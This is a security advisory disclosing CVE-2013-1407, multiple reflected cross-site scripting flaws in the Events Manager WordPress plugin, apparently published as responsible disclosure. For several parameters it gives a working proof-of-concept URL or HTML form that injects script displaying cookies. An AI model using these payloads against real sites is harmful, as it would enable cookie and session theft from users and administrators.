Multiple XSS vulnerabilities in Events Manager WordPress plugin

High-Tech Bridge Security Research Lab discovered multiple XSS vulnerabilities in Events Manager WordPress plugin, which can be exploited to perform Cross-Site Scripting attacks.

1. Multiple XSS vulnerabilities in Events Manager WordPress plugin: CVE-2013-1407
   1.1 The vulnerability exists due to insufficient filtration of user-supplied data in “scope” HTTP GET parameter passed to “/index.php” script. A remote attacker can trick user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
   PoC (Proof-of-Concept) below uses the “alert()” JavaScript function to display user’s cookies:
   http://[host]/?page_id=42&scope=%22%3E%3Cscript%3Ealert%28document.cookie%29 ;%3C/script%3E,%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

1.2 The vulnerability exists due to insufficient filtration of user-supplied data in “_wpnonce” HTTP GET parameter passed to “/wp-admin/edit.php” script. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
PoC (Proof-of-Concept) below uses “alert()” JavaScript function to display administrator’s cookies:
http://[host]/wp-admin/edit.php?post_type=event&page=events-manager-bookings &_wpnonce=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

1.3 The vulnerabilities exist due to insufficient filtration of user-supplied data in “user_name”, “dbem_phone” and “user_email” HTTP GET parameters passed to “/index.php” script. A remote attacker can trick user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
PoCs (Proof-of-Concept) below use the “alert()” JavaScript function to display user’s cookies:
http://[host]/?event=1&user_name=%27%3E%3Cscript%3Ealert%28document.cookie%2 9;%3C/script%3E
http://[host]/?event=1&dbem_phone=%27%3E%3Cscript%3Ealert%28document.cookie% 29;%3C/script%3E
http://[host]/?event=1&user_email=%27%3E%3Cscript%3Ealert%28document.cookie% 29;%3C/script%3E

1.4 The vulnerability exists due to insufficient filtration of user-supplied data in “booking_comment” HTTP POST parameter passed to “/index.php” script. A remote attacker can trick user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
PoC (Proof-of-Concept) below uses the “alert()” JavaScript function to display user’s cookies:
<form action=“http://[host]/?event=1” method=“post” name=“askform”>
<input type=“hidden” name=“booking_comment” value=“</textarea><script>alert(document.cookie);</script>”/>
<input type=“submit” id=“btn”>
</form>
Vulnerabilities 1.3 and 1.4 will work only against unauthorized (not logged-in) users. Successful exploitation of these vulnerabilities also requires that event with id = 1 has turned-on registration.